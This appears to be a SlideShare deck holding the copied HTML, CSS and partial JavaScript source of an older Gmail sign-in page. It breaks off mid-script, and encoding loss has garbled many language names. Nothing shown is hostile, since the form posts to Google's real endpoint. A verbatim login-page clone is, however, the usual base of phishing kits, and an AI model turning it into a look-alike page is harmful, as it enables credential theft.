SlideShare ist ein Scribd-Unternehmen logo
1 von 34
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta content="width=300, initial-scale=1" name="viewport">
<meta name="description" content="Gmail is email that&#39;s intuitive,
efficient, and useful. 15 GB of storage, less spam, and mobile access.">
<title>Gmail</title>
<style>
html, body {
font-family: Arial, sans-serif;
background: #fff;
margin: 0;
padding: 0;
border: 0;
position: absolute;
height: 100%;
min-width: 100%;
font-size: 13px;
color: #404040;
direction: ltr;
-webkit-text-size-adjust: none;
}
button,
input[type=button],
input[type=submit] {
font-family: Arial, sans-serif;
}
a,
a:hover,
a:visited {
color: #427fed;
cursor: pointer;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
h1 {
font-size: 20px;
color: #262626;
margin: 0 0 15px;
font-weight: normal;
}
h2 {
font-size: 14px;
color: #262626;
margin: 0 0 15px;
font-weight: bold;
}
input[type=email],
input[type=number],
input[type=password],
input[type=tel],
input[type=text],
input[type=url] {
-moz-appearance: none;
-webkit-appearance: none;
appearance: none;
display: inline-block;
height: 36px;
padding: 0 8px;
line-height: 36px;
margin: 0;
background: #fff;
border: 1px solid #d9d9d9;
border-top: 1px solid #c0c0c0;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
-moz-border-radius: 1px;
-webkit-border-radius: 1px;
border-radius: 1px;
font-size: 15px;
color: #404040;
}
input[type=email]:hover,
input[type=number]:hover,
input[type=password]:hover,
input[type=tel]:hover,
input[type=text]:hover,
input[type=url]:hover {
border: 1px solid #b9b9b9;
border-top: 1px solid #a0a0a0;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
}
input[type=email]:focus,
input[type=number]:focus,
input[type=password]:focus,
input[type=tel]:focus,
input[type=text]:focus,
input[type=url]:focus {
outline: none;
border: 1px solid #4d90fe;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
input[type=checkbox],
input[type=radio] {
-webkit-appearance: none;
display: inline-block;
width: 13px;
height: 13px;
margin: 0;
cursor: pointer;
vertical-align: bottom;
background: #fff;
border: 1px solid #c6c6c6;
-moz-border-radius: 1px;
-webkit-border-radius: 1px;
border-radius: 1px;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
position: relative;
border: 0;
width: 16px;
height: 16px;
box-sizing: content-box;
background: none;
}
input[type=checkbox]:active,
input[type=radio]:active {
background: #ebebeb;
}
input[type=checkbox]:hover {
border-color: #c6c6c6;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
}
input[type=radio] {
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
width: 15px;
height: 15px;
}
input[type=checkbox]:checked,
input[type=radio]:checked {
background: #fff;
}
input[type=radio]:checked::after {
content: '';
display: block;
position: relative;
top: 3px;
left: 3px;
width: 7px;
height: 7px;
background: #666;
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
}
input[type=checkbox]:checked::after {
content: url(//ssl.gstatic.com/ui/v1/menu/checkmark.png);
display: block;
position: absolute;
top: -6px;
left: -5px;
}
input[type=checkbox]:focus {
outline: none;
border-color: #4d90fe;
}
.stacked-label {
display: block;
font-weight: bold;
margin: .5em 0;
}
.hidden-label {
position: absolute !important;
clip: rect(1px 1px 1px 1px); /* IE6, IE7 */
clip: rect(1px, 1px, 1px, 1px);
height: 0px;
width: 0px;
overflow: hidden;
visibility: hidden;
}
input[type=checkbox].form-error,
input[type=email].form-error,
input[type=number].form-error,
input[type=password].form-error,
input[type=text].form-error,
input[type=tel].form-error,
input[type=url].form-error {
border: 1px solid #dd4b39;
}
.error-msg {
margin: .5em 0;
display: block;
color: #dd4b39;
line-height: 17px;
}
.help-link {
background: #dd4b39;
padding: 0 5px;
color: #fff;
font-weight: bold;
display: inline-block;
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
text-decoration: none;
position: relative;
top: 0px;
}
.help-link:visited {
color: #fff;
}
.help-link:hover {
color: #fff;
background: #c03523;
text-decoration: none;
}
.help-link:active {
opacity: 1;
background: #ae2817;
}
.wrapper {
position: relative;
min-height: 100%;
}
.content {
padding: 0 44px;
}
.main {
padding-bottom: 100px;
}
/* For modern browsers */
.clearfix:before,
.clearfix:after {
content: "";
display: table;
}
.clearfix:after {
clear: both;
}
/* For IE 6/7 (trigger hasLayout) */
.clearfix {
zoom:1;
}
.google-header-bar {
height: 71px;
border-bottom: 1px solid #e5e5e5;
overflow: hidden;
}
.header .logo {
margin: 17px 0 0;
float: left;
height: 38px;
width: 116px;
}
.header .secondary-link {
margin: 28px 0 0;
float: right;
}
.header .secondary-link a {
font-weight: normal;
}
.google-header-bar.centered {
border: 0;
height: 108px;
}
.google-header-bar.centered .header .logo {
float: none;
margin: 40px auto 30px;
display: block;
}
.google-header-bar.centered .header .secondary-link {
display: none
}
.google-footer-bar {
position: absolute;
bottom: 0;
height: 35px;
width: 100%;
border-top: 1px solid #e5e5e5;
overflow: hidden;
}
.footer {
padding-top: 7px;
font-size: .85em;
white-space: nowrap;
line-height: 0;
}
.footer ul {
float: left;
max-width: 80%;
padding: 0;
}
.footer ul li {
color: #737373;
display: inline;
padding: 0;
padding-right: 1.5em;
}
.footer a {
color: #737373;
}
.lang-chooser-wrap {
float: right;
display: inline;
}
.lang-chooser-wrap img {
vertical-align: middle;
}
.hidden {
height: 0px;
width: 0px;
overflow: hidden;
visibility: hidden;
display: none !important;
}
.card {
background-color: #f7f7f7;
padding: 20px 25px 30px;
margin: 0 auto 25px;
width: 304px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
border-radius: 2px;
-moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
-webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
}
.card *:first-child {
margin-top: 0;
}
.rc-button {
display: inline-block;
min-width: 46px;
text-align: center;
color: #444;
font-size: 14px;
font-weight: 700;
height: 36px;
padding: 0 8px;
line-height: 36px;
-moz-border-radius: 3px;
-webkit-border-radius: 3px;
border-radius: 3px;
-o-transition: all 0.218s;
-moz-transition: all 0.218s;
-webkit-transition: all 0.218s;
transition: all 0.218s;
border: 1px solid #dcdcdc;
background-color: #f5f5f5;
background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: linear-gradient(top,#f5f5f5,#f1f1f1);
-o-transition: none;
-moz-user-select: none;
-webkit-user-select: none;
user-select: none;
cursor: default;
}
.card .rc-button {
width: 100%;
padding: 0;
}
.rc-button:hover {
border: 1px solid #c6c6c6;
color: #333;
text-decoration: none;
-o-transition: all 0.0s;
-moz-transition: all 0.0s;
-webkit-transition: all 0.0s;
transition: all 0.0s;
background-color: #f8f8f8;
background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: linear-gradient(top,#f8f8f8,#f1f1f1);
-moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
-webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
box-shadow: 0 1px 1px rgba(0,0,0,0.1);
}
.rc-button:active {
background-color: #f6f6f6;
background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: linear-gradient(top,#f6f6f6,#f1f1f1);
-moz-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
box-shadow: 0 1px 2px rgba(0,0,0,0.1);
}
.rc-button-submit {
border: 1px solid #3079ed;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.1);
background-color: #4d90fe;
background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);
background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);
background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);
background-image: -o-linear-gradient(top,#4d90fe,#4787ed);
background-image: linear-gradient(top,#4d90fe,#4787ed);
}
.rc-button-submit:hover {
border: 1px solid #2f5bb7;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.3);
background-color: #357ae8;
background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
background-image: linear-gradient(top,#4d90fe,#357ae8);
}
.rc-button-submit:active {
background-color: #357ae8;
background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
background-image: linear-gradient(top,#4d90fe,#357ae8);
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
.rc-button-red {
border: 1px solid transparent;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.1);
background-color: #d14836;
background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);
background-image: -moz-linear-gradient(top,#dd4b39,#d14836);
background-image: -ms-linear-gradient(top,#dd4b39,#d14836);
background-image: -o-linear-gradient(top,#dd4b39,#d14836);
background-image: linear-gradient(top,#dd4b39,#d14836);
}
.rc-button-red:hover {
border: 1px solid #b0281a;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.3);
background-color: #c53727;
background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);
background-image: -moz-linear-gradient(top,#dd4b39,#c53727);
background-image: -ms-linear-gradient(top,#dd4b39,#c53727);
background-image: -o-linear-gradient(top,#dd4b39,#c53727);
background-image: linear-gradient(top,#dd4b39,#c53727);
}
.rc-button-red:active {
border: 1px solid #992a1b;
background-color: #b0281a;
background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a);
background-image: -moz-linear-gradient(top,#dd4b39,#b0281a);
background-image: -ms-linear-gradient(top,#dd4b39,#b0281a);
background-image: -o-linear-gradient(top,#dd4b39,#b0281a);
background-image: linear-gradient(top,#dd4b39,#b0281a);
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.google-header-bar.centered {
height: 83px;
}
.google-header-bar.centered .header .logo {
margin: 25px auto 20px;
}
.card {
margin-bottom: 20px;
}
</style>
<style media="screen and (max-width: 580px)">
html, body {
font-size: 14px;
}
.google-header-bar.centered {
height: 73px;
}
.google-header-bar.centered .header .logo {
margin: 20px auto 15px;
}
.content {
padding-left: 10px;
padding-right: 10px;
}
.hidden-small {
display: none;
}
.card {
padding: 20px 15px 30px;
width: 270px;
}
.footer ul li {
padding-right: 1em;
}
.lang-chooser-wrap {
display: none;
}
</style>
<style>
pre.debug {
font-family: monospace;
position: absolute;
left: 0;
margin: 0;
padding: 1.5em;
font-size: 13px;
background: #f1f1f1;
border-top: 1px solid #e5e5e5;
direction: ltr;
white-space: pre-wrap;
width: 90%;
overflow: hidden;
}
</style>
<link href="//fonts.googleapis.com/css?family=Open+Sans:300,400&lang=en"
rel="stylesheet" type="text/css">
<style>
.banner {
text-align: center;
}
.banner h1 {
font-family: 'Open Sans', arial;
-webkit-font-smoothing: antialiased;
color: #555;
font-size: 42px;
font-weight: 300;
margin-top: 0;
margin-bottom: 20px;
}
.banner h2 {
font-family: 'Open Sans', arial;
-webkit-font-smoothing: antialiased;
color: #555;
font-size: 18px;
font-weight: 400;
margin-bottom: 20px;
}
.signin-card {
width: 274px;
padding: 40px 40px;
}
.signin-card .profile-img {
width: 96px;
height: 96px;
margin: 0 auto 10px;
display: block;
-moz-border-radius: 50%;
-webkit-border-radius: 50%;
border-radius: 50%;
}
.signin-card .profile-name {
font-size: 16px;
font-weight: bold;
text-align: center;
margin: 10px 0 0;
min-height: 1em;
}
.signin-card input[type=email],
.signin-card input[type=password],
.signin-card input[type=text],
.signin-card input[type=submit] {
width: 100%;
display: block;
margin-bottom: 10px;
z-index: 1;
position: relative;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
.signin-card #Email,
.signin-card #Passwd,
.signin-card .captcha {
direction: ltr;
height: 44px;
font-size: 16px;
}
.signin-card #Email + .stacked-label {
margin-top: 15px;
}
.signin-card #reauthEmail {
display: block;
margin-bottom: 10px;
line-height: 36px;
padding: 0 8px;
font-size: 15px;
color: #404040;
line-height: 2;
margin-bottom: 10px;
font-size: 14px;
text-align: center;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
.one-google p {
margin: 0 0 10px;
color: #555;
font-size: 14px;
text-align: center;
}
.one-google p.create-account,
.one-google p.switch-account {
margin-bottom: 60px;
}
.one-google img {
display: block;
width: 210px;
height: 17px;
margin: 10px auto;
}
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.banner h1 {
font-size: 38px;
margin-bottom: 15px;
}
.banner h2 {
margin-bottom: 15px;
}
.one-google p.create-account,
.one-google p.switch-account {
margin-bottom: 30px;
}
.signin-card #Email {
margin-bottom: 0;
}
.signin-card #Passwd {
margin-top: -1px;
}
.signin-card #Email.form-error,
.signin-card #Passwd.form-error {
z-index: 2;
}
.signin-card #Email:hover,
.signin-card #Email:focus,
.signin-card #Passwd:hover,
.signin-card #Passwd:focus {
z-index: 3;
}
</style>
<style media="screen and (max-width: 580px)">
.banner h1 {
font-size: 22px;
margin-bottom: 15px;
}
.signin-card {
width: 260px;
padding: 20px 20px;
margin: 0 auto 20px;
}
.signin-card .profile-img {
width: 72px;
height: 72px;
-moz-border-radius: 72px;
-webkit-border-radius: 72px;
border-radius: 72px;
}
</style>
<style>
.jfk-tooltip {
background-color: #fff;
border: 1px solid;
color: #737373;
font-size: 12px;
position: absolute;
z-index: 800 !important;
border-color: #bbb #bbb #a8a8a8;
padding: 16px;
width: 250px;
}
.jfk-tooltip h3 {
color: #555;
font-size: 12px;
margin: 0 0 .5em;
}
.jfk-tooltip-content p:last-child {
margin-bottom: 0;
}
.jfk-tooltip-arrow {
position: absolute;
}
.jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore,
.jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
display: block;
height: 0;
position: absolute;
width: 0;
}
.jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore {
border: 9px solid;
}
.jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
border: 8px solid;
}
.jfk-tooltip-arrowdown {
bottom: 0;
}
.jfk-tooltip-arrowup {
top: -9px;
}
.jfk-tooltip-arrowleft {
left: -9px;
top: 30px;
}
.jfk-tooltip-arrowright {
right: 0;
top: 30px;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore,.jfk-tooltip-arrowup .jfktooltip-arrowimplbefore {
border-color: #bbb transparent;
left: -9px;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
border-color: #a8a8a8 transparent;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter,.jfk-tooltip-arrowup .jfktooltip-arrowimplafter {
border-color: #fff transparent;
left: -8px;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
border-bottom-width: 0;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter {
border-bottom-width: 0;
}
.jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
border-top-width: 0;
}
.jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
border-top-width: 0;
top: 1px;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore,
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
border-color: transparent #bbb;
top: -9px;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter,
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
border-color:transparent #fff;
top:-8px;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore {
border-left-width: 0;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter {
border-left-width: 0;
left: 1px;
}
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
border-right-width: 0;
}
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
border-right-width: 0;
}
.jfk-tooltip-closebtn {
background: url("//ssl.gstatic.com/ui/v1/icons/common/x_8px.png") no-repeat;
border: 1px solid transparent;
height: 21px;
opacity: .4;
outline: 0;
position: absolute;
right: 2px;
top: 2px;
width: 21px;
}
.jfk-tooltip-closebtn:focus,
.jfk-tooltip-closebtn:hover {
opacity: .8;
cursor: pointer;
}
.jfk-tooltip-closebtn:focus {
border-color: #4d90fe;
}
</style>
<style media="screen and (max-width: 580px)">
.jfk-tooltip {
display: none;
}
</style>
<style>
.need-help-reverse {
float: right;
}
.remember .bubble-wrap {
position: absolute;
padding-top: 3px;
-o-transition: opacity .218s ease-in .218s;
-moz-transition: opacity .218s ease-in .218s;
-webkit-transition: opacity .218s ease-in .218s;
transition: opacity .218s ease-in .218s;
left: -999em;
opacity: 0;
width: 314px;
margin-left: -20px;
}
.remember:hover .bubble-wrap,
.remember input:focus ~ .bubble-wrap,
.remember .bubble-wrap:hover,
.remember .bubble-wrap:focus {
opacity: 1;
left: inherit;
}
.bubble-pointer {
border-left: 10px solid transparent;
border-right: 10px solid transparent;
border-bottom: 10px solid #fff;
width: 0;
height: 0;
margin-left: 17px;
}
.bubble {
background-color: #fff;
padding: 15px;
margin-top: -1px;
font-size: 11px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
border-radius: 2px;
-moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
-webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
}
.dasher-tooltip {
position: absolute;
left: 50%;
top: 380px;
margin-left: 150px;
}
.dasher-tooltip .tooltip-pointer {
margin-top: 15px;
}
.dasher-tooltip p {
margin-top: 0;
}
.dasher-tooltip p span {
display: block;
}
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.dasher-tooltip {
top: 340px;
}
</style>
</head>
<body>
<div class="wrapper">
<div class="google-header-bar centered">
<div class="header content clearfix">
<img alt="Google" class="logo"
src="//ssl.gstatic.com/accounts/ui/logo_2x.png">
</div>
</div>
<div class="main content clearfix">
<div class="banner">
<h1>
One account. All of Google.
</h1>
<h2 class="hidden-small">
Sign in to continue to Gmail
</h2>
</div>
<div class="card signin-card clearfix">
<div id="cc_iframe_parent"></div>
<img class="profile-img" src="//ssl.gstatic.com/accounts/ui/avatar_2x.png"
alt="">
<p class="profile-name"></p>
<form novalidate method="post"
action="https://accounts.google.com/ServiceLoginAuth" id="gaia_loginform">
<input name="GALX" type="hidden"
value="KeJi_T74zTk">
<input name="continue" type="hidden" value="http://mail.google.com/mail/">
<input name="service" type="hidden" value="mail">
<input name="rm" type="hidden" value="false">
<input name="ltmpl" type="hidden" value="default">
<input name="scc" type="hidden" value="1">
<input type="hidden" id="_utf8" name="_utf8" value="&#9731;"/>
<input type="hidden" name="bgresponse" id="bgresponse" value="js_disabled">
<input type="hidden" id="pstMsg" name="pstMsg" value="0">
<input type="hidden" id="dnConn" name="dnConn" value="">
<input type="hidden" id="checkConnection" name="checkConnection" value="">
<input type="hidden" id="checkedDomains" name="checkedDomains"
value="youtube">
<label class="stacked-label" for="Email">Email</label>
<input id="Email" name="Email" type="email"
placeholder="Email"
value=""
spellcheck="false"
class="">
<label class="stacked-label" for="Passwd">Password</label>
<input id="Passwd" name="Passwd" type="password"
placeholder="Password"
class="">
<input id="signIn" name="signIn" class="rc-button rc-button-submit"
type="submit" value="Sign in">
<label class="remember">
<input id="PersistentCookie" name="PersistentCookie"
type="checkbox" value="yes"
>
<span>
Stay signed in
</span>
<div class="bubble-wrap" role="tooltip">
<div class="bubble-pointer"></div>
<div class="bubble">
For your protection, keep this checked only on devices you use regularly.
<a href="https://support.google.com/accounts/?p=securesignin&hl=en"
target="_blank">Learn more</a>
</div>
</div>
</label>
<input type="hidden" name="rmShown" value="1">
<a id="link-forgot-passwd" href="https://accounts.google.com/RecoverAccount?
service=mail&amp;continue=http%3A%2F%2Fmail.google.com%2Fmail%2F"
class="need-help-reverse">
Need help?
</a>
</form>
</div>
<div class="one-google">
<p class="create-account">
<a id="link-signup" href="https://accounts.google.com/SignUp?
service=mail&amp;continue=http%3A%2F%2Fmail.google.com%2Fmail
%2F&amp;ltmpl=default">
Create an account
</a>
</p>
<p class="tagline">
One Google Account for everything Google
</p>
<img src="//ssl.gstatic.com/accounts/ui/logo_strip_2x.png" width="210"
height="17" alt="">
</div>
</div>
<div class="google-footer-bar">
<div class="footer content clearfix">
<ul id="footer-list">
<li>
Google
</li>
<li>
<a href="https://accounts.google.com/TOS?loc=CA&hl=en" target="_blank">
Privacy &amp; Terms
</a>
</li>
<li>
<a href="http://www.google.com/support/accounts?hl=en" target="_blank">
Help
</a>
</li>
</ul>
<div id="lang-vis-control" style="display: none">
<span id="lang-chooser-wrap" class="lang-chooser-wrap">
<label for="lang-chooser"><img
src="//ssl.gstatic.com/images/icons/ui/common/universal_language_settings21.png" alt="Change language"></label>
<select id="lang-chooser" class="lang-chooser" name="lang-chooser">
<option value="af"
>
?Afrikaans?
</option>
<option value="az"
>
?az?rbaycanca?
</option>
<option value="in"
>
?Bahasa Indonesia?
</option>
<option value="ms"
>
?Bahasa Melayu?
</option>
<option value="ca"
>
?català?
</option>
<option value="cs"
>
?ceština?
</option>
<option value="da"
>
?dansk?
</option>
<option value="de"
>
?Deutsch?
</option>
<option value="et"
>
?eesti?
</option>
<option value="en-GB"
>
?English (United Kingdom)?
</option>
<option value="en"
selected="selected"
>
?English (United States)?
</option>
<option value="es"
>
?español (España)?
</option>
<option value="es-419"
>
?español (Latinoamérica)?
</option>
<option value="eu"
>
?euskara?
</option>
<option value="fil"
>
?Filipino?
</option>
<option value="fr-CA"
>
?français (Canada)?
</option>
<option value="fr"
>
?français (France)?
</option>
<option value="gl"
>
?galego?
</option>
<option value="hr"
>
?hrvatski?
</option>
<option value="zu"
>
?isiZulu?
</option>
<option value="is"
>
?íslenska?
</option>
<option value="it"
>
?italiano?
</option>
<option value="sw"
>
?Kiswahili?
</option>
<option value="lv"
>
?latviešu?
</option>
<option value="lt"
>
?lietuviu?
</option>
<option value="hu"
>
?magyar?
</option>
<option value="nl"
>
?Nederlands?
</option>
<option value="no"
>
?norsk?
</option>
<option value="pl"
>
?polski?
</option>
<option value="pt"
>
?português?
</option>
<option value="pt-BR"
>
?português (Brasil)?
</option>
<option value="pt-PT"
>
?português (Portugal)?
</option>
<option value="ro"
>
?româna?
</option>
<option value="sk"
>
?slovencina?
</option>
<option value="sl"
>
?slovenšcina?
</option>
<option value="fi"
>
?suomi?
</option>
<option value="sv"
>
?svenska?
</option>
<option value="vi"
>
?Ti?ng Vi?t?
</option>
<option value="tr"
>
?Türkçe?
</option>
<option value="el"
>
??????????
</option>
<option value="bg"
>
???????????
</option>
<option value="mn"
>
????????
</option>
<option value="ru"
>
?????????
</option>
<option value="sr"
>
????????
</option>
<option value="uk"
>
????????????
</option>
<option value="ka"
>
?????????
</option>
<option value="hy"
>
?????????
</option>
<option value="iw"
>
????????
</option>
<option value="ur"
>
???????
</option>
<option value="ar"
>
??????????
</option>
<option value="fa"
>
????????
</option>
<option value="am"
>
??????
</option>
<option value="ne"
>
????????
</option>
<option value="mr"
>
???????
</option>
<option value="hi"
>
????????
</option>
<option value="bn"
>
???????
</option>
<option value="gu"
>
?????????
</option>
<option value="ta"
>
???????
</option>
<option value="te"
>
????????
</option>
<option value="kn"
>
???????
</option>
<option value="ml"
>
????????
</option>
<option value="si"
>
???????
</option>
<option value="th"
>
?????
</option>
<option value="lo"
>
?????
</option>
<option value="km"
>
???????
</option>
<option value="ko"
>
?????
</option>
<option value="zh-HK"
>
???(??)?
</option>
<option value="ja"
>
?????
</option>
<option value="zh-CN"
>
??????
</option>
<option value="zh-TW"
>
??????
</option>
</select>
</span>
</div>
</div>
</div>
</div>
<script>
(function(){
var splitByFirstChar = function(toBeSplit, splitChar) {
var index = toBeSplit.indexOf(splitChar);
if (index >= 0) {
return [toBeSplit.substring(0, index),
toBeSplit.substring(index + 1)];
}
return [toBeSplit];
}
var langChooser_parseParams = function(paramsSection) {
if (paramsSection) {
var query = {};
var params = paramsSection.split('&');
for (var i = 0; i < params.length; i++) {
var param = splitByFirstChar(params[i], '=');
if (param.length == 2) {
query[param[0]] = param[1];
}
}
return query;
}
return {};
}
var langChooser_getParamStr = function(params) {
var paramsStr = [];
for (var a in params) {
paramsStr.push(a + "=" + params[a]);
}
return paramsStr.join('&');
}
var langChooser_currentUrl = window.location.href;
var match = langChooser_currentUrl.match("^(.*?)(?(.*?))?(#(.*))?$");
var langChooser_currentPath = match[1];
var langChooser_params = langChooser_parseParams(match[3]);
var langChooser_fragment = match[5];
var langChooser = document.getElementById('lang-chooser');
var langChooserWrap = document.getElementById('lang-chooser-wrap');
var langVisControl = document.getElementById('lang-vis-control');
if (langVisControl && langChooser) {
langVisControl.style.display = 'inline';
langChooser.onchange = function() {
langChooser_params['lp'] = 1;
langChooser_params['hl'] = encodeURIComponent(this.value);
var paramsStr = langChooser_getParamStr(langChooser_params);
var newHref = langChooser_currentPath + "?" + paramsStr;
if (langChooser_fragment) {
newHref = newHref + "#" + langChooser_fragment;
}
window.location.href = newHref;
};
}
})();
</script>
<script type="text/javascript">
var gaia_attachEvent = function(element, event, callback) {
if (element.addEventListener) {
element.addEventListener(event, callback, false);
} else if (element.attachEvent) {
element.attachEvent('on' + event, callback);
}
};
</script>
<script>var G;var Gb=function(a,b){var c=a;a&&"string"==typeof
a&&(c=document.getElementById(a));if(b&&!c)throw new Ga(a);return
c},Ga=function(a){this.id=a;this.toString=function(){return"No element found for
id '"+this.id+"'"}};var Gc={},Gd;Gd=window.addEventListener?function(a,b,c){var
d=function(a){var b=c.call(this,a);!1===b&&Ge(a);return b};a=Gb(a,!
0);a.addEventListener(b,d,!1);Gf(a,b).push(d);return d}:window.attachEvent?
function(a,b,c){a=Gb(a,!0);var d=function(){var b=window.event,d=c.call(a,b);!
1===d&&Ge(b);return d};a.attachEvent("on"+b,d);Gf(a,b).push(d);return d}:void
0;var Ge=function(a){a.preventDefault?a.preventDefault():a.returnValue=!
1;return!1};
var Gf=function(a,b){Gc[a]=Gc[a]||{};Gc[a][b]=Gc[a][b]||[];return Gc[a][b]};var
Gg=function(){try{return new XMLHttpRequest}catch(a){for(var
b=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP
"],c=0;c<b.length;c++)try{return new ActiveXObject(b[c])}catch(d){}}return
null},Gh=function()
{this.g=Gg();this.parameters={}};Gh.prototype.oncomplete=function(){};
Gh.prototype.send=function(a){var b=[],c;for(c in this.parameters){var
d=this.parameters[c];b.push(c+"="+encodeURIComponent(d))}var
b=b.join("&"),e=this.g,f=this.oncomplete;e.open("POST",a,!
0);e.setRequestHeader("Content-type","application/x-www-formurlencoded");e.onreadystatechange=function()
{4==e.readyState&&f({status:e.status,text:e.responseText})};e.send(b)};
Gh.prototype.get=function(a){var b=this.oncomplete,c=this.g;c.open("GET",a,!
0);c.onreadystatechange=function()
{4==c.readyState&&b({status:c.status,text:c.responseText})};c.send()};var
Gj=function(a){this.e=a;this.k=this.l();if(null==this.e)throw new Gi("Empty
module name");};G=Gj.prototype;G.l=function(){var
a=window.location.pathname;return
a&&0==a.indexOf("/accounts")?"/accounts/JsRemoteLog":"/JsRemoteLog"};
G.n=function(a,b,c){var d=this.k,e=this.e||"",d=d+"?
module="+encodeURIComponent(e);a=a||"";d=d+"&type="+encodeURIComponent(a);b=b||"
";d=d+"&msg="+encodeURIComponent(b);c=c||[];for(a=0;a<c.length;a+
+)d=d+"&arg="+encodeURIComponent(c[a]);try{var
f=Math.floor(1E4*Math.random()),d=d+"&r="+String(f)}catch(g){}return
d};G.send=function(a,b,c){var d=new Gh;d.parameters={};try{var
e=this.n(a,b,c);d.get(e)}catch(f){}};G.error=function(a,b)
{this.send("ERROR",a,b)};G.warn=function(a,b){this.send("WARN",a,b)};
G.info=function(a,b){this.send("INFO",a,b)};G.f=function(a){var b=this;return
function(){try{return a.apply(null,arguments)}catch(c){throw b.error("Uncatched
